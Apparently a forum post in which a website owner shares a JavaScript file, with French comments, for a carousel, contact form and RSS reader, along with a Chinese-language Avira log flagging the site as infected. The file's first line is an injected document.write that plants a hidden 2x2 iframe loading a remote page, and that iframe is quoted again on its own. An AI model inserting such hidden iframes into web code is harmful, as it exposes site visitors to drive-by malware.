- document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://brg-catalogues.com/mzcf.html?j=3354227></iframe>');
- $(document).ready(function() {
- $(".carousel").dualSlider({
- auto: true,
- autoDelay: 6000,
- easingCarousel: "easeInOutBack",
- easingDetails: "easeInOutExpo",
- durationCarousel: 800,
- durationDetails: 500
- });
- function get_date() {
- var mou = new Date();
- // conversion en string
- var str = mou.toGMTString();
- alert(str);
- }
- /*Creation du Dialog*/
- function dial_ok()
- {
- $("#confirmation").dialog({
- modal: true,
- buttons: {
- Ok: function() {
- $(this).dialog("close");
- },
- }
- });
- }
- function dial() {
- $('#confirmation').dialog(
- {
- height: 150,
- width: 500,
- modal: true,
- close: function(event, ui) {
- //alert("ce dernier va fermer la fenetre ");
- /* reinitialisation du formaulire */
- $('#spinner').show();
- $('#texte').hide();
- document.getElementById("contacts-form").reset();
- },
- });
- }
- function valider() {
- var nom = $('#nom').val();
- var email = $('#email').val();
- var tel = $('#tel').val();
- var message = $('#message').val();
- //affichage du spinner
- /* alert("le nom est " + nom);
- alert("le email est " + email);
- alert("la valeur de tel est " + tel );
- alert("la valeur de message" + message);*/
- dial();
- $.post('form.php', {
- nom: nom,
- email: email,
- tel: tel,
- message: message
- }, function success(data) {
- //alert("test");
- $('#spinner').hide();
- $('#texte').show();
- } //fin success
- ); //fin post
- } //fin valider
- /*** GESTION DU FLUX RSS DU FICHIER NEWS.xml ******/
- function gen_item(title, linke, desc, date) {
- var elt = "<li><a href=' " + linke + " '> " + title + "</a></li>";
- $('#news.list2').append(elt);
- }
- function parser_ajax(xml)
- {
- /* VERIFICATION SI LE FICHIER XML LU EST COHERENT */
- $(xml).find("item").each(function() {
- //alert("il entre");
- var title = "";
- var linke = "";
- var date = "";
- var desc = "";
- //cette fonction permet de tr
- title = $(this).find("title").text(); /* alert(title); */
- linke = $(this).find("link").text(); /*alert(linke); */
- date = Date.parse($('pubDate').text());
- /*description=$this.find("description").text();
- alert(description);*/
- gen_item(title, linke, desc, date);
- });
- // cette fonctio permet de lire le fichier xml et le parser
- }
- function traiter_ajax() {
- $.ajax({
- type: "GET",
- url: "news.xml",
- dataType: "xml",
- success: function(xml) {
- parser_ajax(xml);
- },
- error: function(XMLHttpRequest, textStatus, errorThrown) {
- alert(" ya une erreur lors du chargement du fichier ");
- }
- });
- }
- traiter_ajax();
- /*SI ON CLIQUE SUR LES BUTTONS ALORS*/
- $('#sub').click(valider); //fin CLICK
- //$('#contacts-form').submit(valider);
- });
复制代码
- <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
- width=2 src=http://brg-catalogues.com/mzcf.html?j=3354227>
- </iframe>
复制代码
Avira
2013/7/14 下午 08:03 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\81REZ51I\krizalid_co_nf[1].htm'
包含病毒或有害的程式 'HTML/TwitScroll.B' [virus]
已採取動作:
發生錯誤,檔案未刪除。錯誤識別碼:26003.
檔案無法刪除!.
嘗試使用 ARK 程式庫執行動作。.
檔案會移動至 '4c4922d1.qua' 名稱底下的隔離區目錄。.
2013/7/14 下午 08:03 [System Scanner] 掃描
掃描結束 [已完成全部的掃描。]。
檔案數: 780
目錄數: 0
惡意程式碼數: 1
警告數: 0
2013/7/14 下午 08:02 [Web Protection] 發現惡意程式碼
從 URL "http://www.krizalid.co.nf/js/script.js" 存取資料時,
發現病毒或有害的程式 'HTML/TwitScroll.B' [virus]。
已採取動作:封鎖的檔案
2013/7/14 下午 08:02 [Web Protection] 發現惡意程式碼
從 URL "http://www.krizalid.co.nf/js/jquery.dualSlider.0.3.js" 存取資料時,
發現病毒或有害的程式 'HTML/TwitScroll.B' [virus]。
已採取動作:封鎖的檔案
2013/7/14 下午 08:02 [Web Protection] 發現惡意程式碼
從 URL "http://www.krizalid.co.nf/js/jquery.timers-1.2.js" 存取資料時,
發現病毒或有害的程式 'HTML/TwitScroll.B' [virus]。
已採取動作:封鎖的檔案
|